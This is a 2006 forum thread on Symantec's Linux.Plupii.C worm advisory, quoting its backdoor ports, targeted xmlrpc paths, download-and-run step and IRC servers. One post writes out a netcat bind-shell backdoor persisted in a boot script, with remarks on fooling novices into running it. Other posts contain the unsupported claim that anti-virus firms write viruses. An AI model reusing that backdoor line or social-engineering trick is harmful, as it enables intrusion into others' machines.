12 replies to this topic

[XIII]

Symantec just launched a warning for detection of linux virus, this is the summary of it :

Linux.Plupii.C is a worm with back door capabilities that spreads by exploiting vulnerabilities.
Type: Worm
Infection Length: 40,7576 bytes
Systems Affected: Linux, Novell Netware, UNIX
Number of infections: 0 - 49
Number of sites: 0 - 2
Geographical distribution: Low
Threat containment: Easy
Removal: Easy

Technical Details :
When Linux.Plupii.C is executed, it performs the following actions:
1. Opens a back door on UDP port 27015, which enables a remote attacker to have unauthorized
access to the compromised computer.
2. Generates IP addresses and uses them to build URLs which include the following strings:
/cvs/
/articles/mambo/
/cvs/mambo/
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc/xmlrpc.php
3. Sends HTTP requests to the URLs it generates, and attempts to spread by exploiting the
following Web server-related vulnerabilities:
The XML-RPC for PHP Remote Code Injection vulnerability (as described in Bugtraq ID
14088)
The AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability (as described
in Bugtraq ID 10950)
The Darryl Burgdorf Webhints Remote Command Execution Vulnerability (as described in
Bugtraq ID 13930)
4. When the worm finds a vulnerable script on the compromised computer, it downloads and
executes a malicious install script from the following Web site:
[http://]198.170.105.69/[REMOVED]
5. Attempts to download the following files to the /tmp/.temp folder:
cb ( Detected as Linux.Plupii.B )
https (A Perl script with IRC back door functionality.)
ping.txt (A Perl script that is a reverse shell back door.)
httpd
6. Attempts to connect to a predetermined IP address on TCP port 8080 and open a shell back door.
7. Opens an IRC back door, which attempts to connect on one of the following IRC servers:
l eu.undernet.org
l us.undernet.org
l 195.204.1.130
l 194.109.20.90
The worm joins a channel that contains the following string and waits for commands from
a remote attacker:
lametrapchan

Source Article Published on Symantec Official Site on 25 th., Feb

To me i think it's not that thread as we can see in its effects, if you have a very weak firewall it will stand against it, also you can notice it from the number of infections though symantec try to say it's a big danger, i think they want to get more sales

Edited by XIII, 05 March 2006 - 08:18 AM.

[Darren]

You can look at this two ways:
1) It's relatively unimportant virus that is easy to block or remove.
2) While this virus isn't a big deal, it may be foreshadowing a lot more which may do more damage.

Personaly i would go with option 2 however it will take many years for a more damaging virus to be made. I also believe that Linux and Unix users are a lot more careful with their computer and have firewalls and don't do stupid things like download huge files that unkown people have sent to them (i know a couple of friends who have done that).

[yordan]

A fact very important is that now viruses come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linus systems.

[nightfox]

A fact very important is that now viruses come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linus systems.

but aren't the viruses on Linux systems open source? lol. And, would the viruses have to be downloaded on ROOT account? Plus, they would have to be easy to remove unlike Windows viruses which attack vital system files & the registry.

[N]F

[qwijibow]

A fact very important is that now viruses come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linus systems.

the forst computer virus/worm spread by a buffer overflow in sendmail running on Unix systems.

People were writing bad code before bill gates even though of starting microsoft.

[XIII]

but aren't the viruses on Linux systems open source? lol. And, would the viruses have to be downloaded on ROOT account? Plus, they would have to be easy to remove unlike Windows viruses which attack vital system files & the registry.

i think the most greatest thread in linux viruses for now is to remove data or format /home or any other file that is permitted to be used by ordinary users not the root or else to open ports for incoming connections so hackers could get into your machine, but as i said, that's for now, i think the problem will be in the future when they could make a virus that can log off from ordinary user and then login again as a root, delete all your files, open ports for hackers, steal your pc and run away

i don't like to save any important files on my pc, or else why did they invent backup systems, cds, dvds, zip disks or even flash memories?

[qwijibow]

on a correctly configured server, this worm is pretty lame.

it does not attempt to exploit any privilage esculation exploits.

and therefor is limited in access to the privilages of the running, exploitable server.

basically, it has just enough access to pass on the worm to anouther exploitable server.

this worm is basically an automated chain letter.

The threat level of very low given in the link on post one seems very accurate.

EDIT

i think the most greatest thread in linux viruses for now is to remove data or format /home or any other file that is permitted to be used by ordinary users not the root or else to open ports for incoming connections so hackers could get into your machine, but as i said, that's for now, i think the problem will be in the future when they could make a virus that can log off from ordinary user and then login again as a root, delete all your files, open ports for hackers, steal your pc and run away

Linux rocks... its so insanely configuable, and its so easy to do anything.

for example... one could program a back-door *torjan* in a single line....

echo " nc -l 6666 -e /bin/bash" >> /etc/init.d/local

that code adds a line to the boot script that runs a command on every boot.

that command listens on port 6666, and forwads all information that arives on port 6666 to bash... ( the comand line executor )
and in return, all bash output it sent back to the attacker via netcat.

linux is very configuarable...

and more and more computer ilitarates are using linux...

how easy would it be to fool a linux newb to running the above command with root privilages... they dont know what it means.

Any Operating system is only as secure as the Admin makes it.

Security holes will always exist while less than perfect people hold the root password.

[hatim]

echo " nc -l 6666 -e /bin/bash" >> /etc/init.d/local

neat stuff : will try it and see how it works ....

yes linux is very configurable. But Distros like Ubuntu make it hard for people to configure things without knowing what they are doing. Windows could also be very configurable but they choose not to.

In my opnion the code quality of Linux and Windows is comparable. The only difference is that whenever a bug comes out , any one can correct it , where in MS it has to be Bob Smith (son of Jhon Smith) who is on vaction to the carribian after he got a big bonus for adding glitter to the START button.

[XIII]

neat stuff : will try it and see how it works ....

yes linux is very configurable. But Distros like Ubuntu make it hard for people to configure things without knowing what they are doing. Windows could also be very configurable but they choose not to.

In my opnion the code quality of Linux and Windows is comparable. The only difference is that whenever a bug comes out , any one can correct it , where in MS it has to be Bob Smith (son of Jhon Smith) who is on vaction to the carribian after he got a big bonus for adding glitter to the START button.

as qwijibow said, linux rocks, if i have the power to change/configure what ever i want, why do u think i will limit myself to windows and microsoft products?, why do we just sit and cry everytime we discover a bug, a hole or a virus??, on linux you will always have the power to solve it "depends on your knowaldge", you aren't in need to wait for a technican to solve it for you, you don't need to wait till Bob Smith to get back to his work to solve it for you.
And by the way, who said Ubuntu makes it hard for people to configure things??, i'm an ubuntu user, i use linux since nearly a year, every thing is configurable, really nothing hard, even if you find something to be hard, just post it to ubuntu official forums and you will get an answer in maximum of 3 hours.
I think symantec tells us by this warning that they are into making linux viruses ooops i meant anti-virus

[yordan]

I think symantec tells us by this warning that they are into making linux viruses ooops i meant anti-virus

Mc Afee already has a version for Linux as well for AIX, since a long time.

[XIII]

Mc Afee already has a version for Linux as well for AIX, since a long time.

a version of the virus or anti-virus?
i wanted to say that most of viruses come from anti-virus companies a way or another, they just try to keep producing thier products, tell me, what if virus-coders "non symantec, mcafee or anyother company coders else" stopped making new viruses?, as you know a time to time you get a rest period of viruses then you get a very dangerous one, it's calm before storm.
anyway, amost of these threats come from these companies, that's why i couldn't trust any of them, i always trust online scaning.
you can get your pc scanned for free online "that means it's updated scan engine" on Pc-cillin official site, i think it's the best solution, when i was using mcafee or norton, i used to update them every few days, sometimes they couldn't discover viruses that online scan did, since that time i stopped using them, now it's too much better without them, i scan my pc online regulary every 1-2 months, and now ofcourse my pc is more faster without these anti-viruses processes run in the background, i don't need auto-protection, i didn't use to download un-trusted files.
That online scan you can find here:

Online Scan

it scans for maleware, grayware, adware.....etc of any xxxxware you know or you don't
and a way or another you feel more safe on linux than windows.

[kaputnik]

Linux viruses are not quite heard about, and a major anti-virus firm coming out with a warning for Linux seems like a PR and/or scare tactic. Automatic installation and even remote installation of a malacious object in a Linux OS is fairly difficult. It is vital to have a firewall, whichever OS one's running and for linux users, who're much more involved with their systems and are generally more aware of the "computing' world around them, this is much of a given.

The thing with Linux users is that much of the software that is used is usually opensource. This is of course very disturbing to companies manufacturing software and especially so for anti-virus firms, since they have a cash cow in renuals itself. With huge swathes of users - especially the young who adapt to Linux so very easily, using Linux, the large companies of the world, non-OS producing (mainly the supporting software) are very worried with the trend.

As far as I can tell, the next few years will see a concerted effort to try the very foundations of Linux for it's strength, much sponsored by large corporations. And Linux will evolve. Like it always has.

[KazDoran]

Viruses/Worms for Linux don't really surprise me, because there was bound to be some jerk around trying to do harm to other people using linux someday, and the ever-increasing number of linux users (especially those who really don't know much on using it, which is quite natural) makes linux a particularly appealing target for viruses in a near future.

Linux viruses aren't unheard of, however... In my own opinion, things as rootkits, which allow access to root through memory stack hacking and buffer overflow, should be classified as viruses, even if they're useful to some people who often forget or mistype their root passwords. Remember that a virus doesn't always have to self-propagate through various machines.